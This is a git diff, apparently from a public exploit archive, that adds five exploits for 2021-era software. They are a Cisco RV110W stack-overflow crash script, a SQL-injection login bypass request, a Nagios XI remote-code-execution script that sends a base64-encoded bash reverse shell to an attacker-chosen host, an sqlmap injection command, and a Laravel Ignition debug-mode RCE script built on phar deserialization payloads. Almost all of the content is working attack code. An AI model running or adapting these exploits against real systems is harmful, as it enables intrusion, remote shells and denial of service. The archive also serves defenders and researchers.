diff --git a/exploits/hardware/webapps/49425.py b/exploits/hardware/webapps/49425.py new file mode 100755 index 000000000..337421908 --- /dev/null +++ b/exploits/hardware/webapps/49425.py @@ -0,0 +1,118 @@ +# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC) +# Date: 2021-01 +# Exploit Author: Shizhi He +# Vendor Homepage: https://www.cisco.com/ +# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7 +# Version: V1.2.1.7 +# Tested on: RV110W V1.2.1.7 +# CVE : CVE-2021-1167 +# References: +# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md +# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U + +#!/usr/bin/env python2 + +##### +## Cisco RV110W Remote Stack Overflow. +### Tested on version: V1.2.1.7 (maybe useable on other products and versions) + + +import os +import sys +import re +import urllib +import urllib2 +import getopt +import json +import hashlib +import ssl + +ssl._create_default_https_context = ssl._create_unverified_context + +### +# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco +# This PoC will crash the target HTTP/HTTPS service +### + +#encrypt password +def enc(s): + l = len(s) + s += "%02d" % l + mod = l + 2 + ans = "" + for i in range(64): + tmp = i % mod + ans += s[tmp] + return hashlib.md5(ans).hexdigest() + +if __name__ == "__main__": + print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco" + + IP = sys.argv[1] + PORT = sys.argv[2] + USERNAME = sys.argv[3] + PASSWORD = enc(sys.argv[4]) + url = 'https://' + IP + ':' + PORT + '/' + + #get session_id by POST login.cgi + req = urllib2.Request(url + "login.cgi") + req.add_header('Origin', url) + req.add_header('Upgrade-Insecure-Requests', 1) + req.add_header('Content-Type', 'application/x-www-form-urlencoded') + req.add_header('User-Agent', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') + req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') + req.add_header('Referer', url) + req.add_header('Accept-Encoding', 'gzip, deflate') + req.add_header('Accept-Language', 'en-US,en;q=0.9') + req.add_header('Cookie', 'SessionID=') + data = {"submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": "0", + "change_action": "", + "enc": "1", + "user": USERNAME, + "pwd": PASSWORD, + "sel_lang": "EN" + } + r = urllib2.urlopen(req, urllib.urlencode(data)) + resp = r.read() + login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] + session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] + print session_id + + #trigger stack overflow through POST vpn_account parameter and cause denial of service + req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) + req2.add_header('Origin', url) + req2.add_header('Upgrade-Insecure-Requests', 1) + req2.add_header('Content-Type', 'application/x-www-form-urlencoded') + req2.add_header('User-Agent', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') + req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') + req2.add_header('Referer', url) + req2.add_header('Accept-Encoding', 'gzip, deflate') + req2.add_header('Accept-Language', 'en-US,en;q=0.9') + req2.add_header('Cookie', 'SessionID=') + poc = "a" * 4096 + data_cmd = { + "gui_action": "Apply", + "submit_type": "", + "submit_button": "vpn_client", + "change_action": "", + "pptpd_enable": "0", + "pptpd_localip": "10.0.0.1", + "pptpd_remoteip": "10.0.0.10-14", + "pptpd_account": "", + "vpn_pptpd_account": "1", + "vpn_account": poc, + "change_lan_ip": "0", + "netbios_enable": "0", + "mppe_disable": "0", + "importvpnclient": "", + "browser": "", + "webpage_end": "1", + } + r = urllib2.urlopen(req2, urllib.urlencode(data_cmd)) + resp = r.read() + print resp \ No newline at end of file diff --git a/exploits/php/webapps/49421.txt b/exploits/php/webapps/49421.txt new file mode 100644 index 000000000..2ceb4a3ed --- /dev/null +++ b/exploits/php/webapps/49421.txt @@ -0,0 +1,19 @@ +# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass +# Exploit Author: Richard Jones +# Date: 2021-01-13 +# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +#Exploit URL: http://TARGET/onlinemovies/Plogin.php + POST /onlinemovies/Plogin.php HTTP/1.1 + Host: TARGET + Content-Type: application/x-www-form-urlencoded + Content-Length: 48 + Origin: http://TARGET + Connection: close + Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj + Upgrade-Insecure-Requests: 1 + + mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login= \ No newline at end of file diff --git a/exploits/php/webapps/49422.py b/exploits/php/webapps/49422.py new file mode 100755 index 000000000..8f6b2bb01 --- /dev/null +++ b/exploits/php/webapps/49422.py @@ -0,0 +1,93 @@ +# Exploit Title: Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated) +# Date: 19/12/2020 +# Exploit Author: Haboob Team (https://haboob.sa) +# Vendor Homepage: https://www.nagios.com/products/nagios-xi/ +# Version: Nagios XI 5.7.x +# Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM +# CVE: CVE-2020-35578 + +#!/usr/bin/python3 + +# pip3 install bs4 lxml +import requests +import sys +import warnings +from bs4 import BeautifulSoup +import base64 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +if len(sys.argv) != 6: + print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port") + print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443") + exit() + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] + +request = requests.session() + + +def login(): + # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) + nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False) + content = nsp_str_req.text + soup = BeautifulSoup(content, "lxml") + nsp_str = soup.find_all('input')[0].get('value') + print("[+] Extract login nsp token : %s" % nsp_str) + + # Login + login_info = { + "nsp": nsp_str, + "pageopt": "login", + "username": username, + "password": password + } + login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False) + login_text = login_request.text + + # Check Login Status + if "Core Config Manager" in login_text: + return True + else: + print("[-] Login ... Failed!") + return False + + + +def execute_payload(): + # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) + print("[+] Request upload form ...") + nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False) + content = nsp_str_req.text + soup = BeautifulSoup(content, "lxml") + nsp_str = soup.find_all('input')[1].get('value') + print("[+] Extract upload nsp token : %s" % nsp_str) + + # Payload Base64 Encoding + payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) + payload_bytes = payload_decoded.encode('ascii') + base64_bytes = base64.b64encode(payload_bytes) + payload_encoded = base64_bytes.decode('ascii') + payload = ";echo " + payload_encoded + " | base64 -d | bash;#" + print("[+] Base64 encoded payload : %s" % payload) + + # Payload Execution + multipart_form_data = { + 'upload': (None, '', None), + 'nsp': (None, nsp_str, None), + 'uploadedfile': (payload, 'whatever', 'text/plain'), + 'convert_to_unix': (None, '1', None), + } + print("[+] Sending payload ...") + print("[+] Check your nc ...") + rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False) + + + +if login(): + print("[+] Login ... Success!") + execute_payload() \ No newline at end of file diff --git a/exploits/php/webapps/49423.txt b/exploits/php/webapps/49423.txt new file mode 100644 index 000000000..579b5e079 --- /dev/null +++ b/exploits/php/webapps/49423.txt @@ -0,0 +1,11 @@ +# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection +# Date: 14.1.2021 +# Exploit Author: Aydın Baran Ertemir +# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code +# Version: 1.0 +# Tested on: Kali Linux + +Use SQLMAP: + +sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3 \ No newline at end of file diff --git a/exploits/php/webapps/49424.py b/exploits/php/webapps/49424.py new file mode 100755 index 000000000..82e0697cf --- /dev/null +++ b/exploits/php/webapps/49424.py @@ -0,0 +1,125 @@ +# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution +# Date: 1.14.2021 +# Exploit Author: SunCSR Team +# Vendor Homepage: https://laravel.com/ +# References: +# https://www.ambionics.io/blog/laravel-debug-rce +# https://viblo.asia/p/6J3ZgN8PKmB +# Version: <= 8.4.2 +# Tested on: Ubuntu 18.04 + nginx + php 7.4.3 +# Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce + + +#!/usr/bin/env python3 + +import requests, sys, re, os + +header={ + "Accept": "application/json" +} + +data = { + "solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\ + "parameters":{ + "variableName":"cm0s", + "viewFile":"" + } + } + +def clear_log(url='', viewFile=''): + + global data + + data['parameters']['viewFile'] = viewFile + while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass + requests.post(url=url, json=data, headers=header, verify=False) + requests.post(url=url, json=data, headers=header, verify=False) + +def create_payload(url='', viewFile=''): + + global data + + data['parameters']['viewFile'] = viewFile + resp = requests.post(url=url, json=data, headers=header, verify=False) + if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text: + return True + return False + +def convert(url='', viewFile=''): + + global data + + data['parameters']['viewFile'] = viewFile + resp = requests.post(url=url, json=data, headers=header, verify=False) + if resp.status_code == 200: + return True + return False + +def exploited(url='', viewFile=''): + + global data + + data['parameters']['viewFile'] = viewFile + resp = requests.post(url=url, json=data, headers=header, verify=False) + if resp.status_code == 500 and 'cannot be empty' in resp.text: + m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text) + print() + print(m[0][1]) + +def generate_payload(command='', padding=0): + if '/' in command: + command = command.replace('/', '\/') + command = command.replace('\'', '\\\'') + os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt'''%(command)) + payload = '' + with open('payload.txt', 'r') as fp: + payload = fp.read() + payload = payload.replace('==', '=3D=') + for i in range(padding): + payload += '=00' + os.system('rm -rf payload.txt') + return payload + + +def main(): + + if len(sys.argv) < 4: + print('Usage: %s url path-log command\n'%(sys.argv[0])) + print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0])) + exit(1) + + if not os.path.isfile('./phpggc/phpggc'): + print('Phpggc not found!') + print('Run command: git clone https://github.com/ambionics/phpggc.git') + os.system('git clone https://github.com/ambionics/phpggc.git') + + url = sys.argv[1] + path_log = sys.argv[2] + command = sys.argv[3] + padding = 0 + + payload = generate_payload(command, padding) + if not payload: + print('Generate payload error!') + exit(1) + + if 'http' not in url and 'https' not in url: + url = 'http'+url + else: + url = url+'/_ignition/execute-solution' + + print('\nExploit...') + clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) + create_payload(url, 'AA') + create_payload(url, payload) + while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))): + clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) + create_payload(url, 'AA') + padding += 1 + payload = generate_payload(command, padding) + create_payload(url, payload) + + exploited(url, 'phar://%s'%(path_log)) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 614cf7ef4..78871fb32 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43620,3 +43620,8 @@ id,file,description,date,author,type,platform,port 49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php, 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple, 49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php, +49421,exploits/php/webapps/49421.txt,"Online Movie Streaming 1.0 - Admin Authentication Bypass",2021-01-14,"Richard Jones",webapps,php, +49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php, +49423,exploits/php/webapps/49423.txt,"Online Shopping Cart System 1.0 - 'id' SQL Injection",2021-01-14,"Aydın Baran Ertemir",webapps,php, +49424,exploits/php/webapps/49424.py,"Laravel 8.4.2 debug mode - Remote code execution",2021-01-14,"SunCSR Team",webapps,php, +49425,exploits/hardware/webapps/49425.py,"Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)",2021-01-14,"Shizhi He",webapps,hardware,